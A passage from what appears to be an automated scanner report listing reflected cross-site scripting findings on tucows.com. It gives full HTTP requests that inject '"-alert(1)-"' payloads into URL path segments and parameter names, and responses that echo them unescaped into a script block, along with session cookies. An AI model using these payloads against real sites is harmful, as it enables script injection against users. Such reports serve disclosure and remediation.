Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets87e88"-alert(1)-"29fef7fc009/includes/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.253. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff73f"-alert(1)-"c3006f1651f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includesff73f"-alert(1)-"c3006f1651f/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.254. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8e6b"-alert(1)-"3078349caa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbarb8e6b"-alert(1)-"3078349caa2/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.255. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a3c"-alert(1)-"0443944911d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.256. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199e2"-alert(1)-"fac9720e4d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.257. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"79cf1522983 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.258. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/corpbar/cb3.0/css/style.css

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be67"-alert(1)-"26a6c055dc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.259. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41642"-alert(1)-"3787a403d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.260. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7b02"-alert(1)-"7b6e920b807 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.261. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56eb6"-alert(1)-"cf82ccc0327 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.262. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/aalib.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c99"-alert(1)-"55fa4663456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:48 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
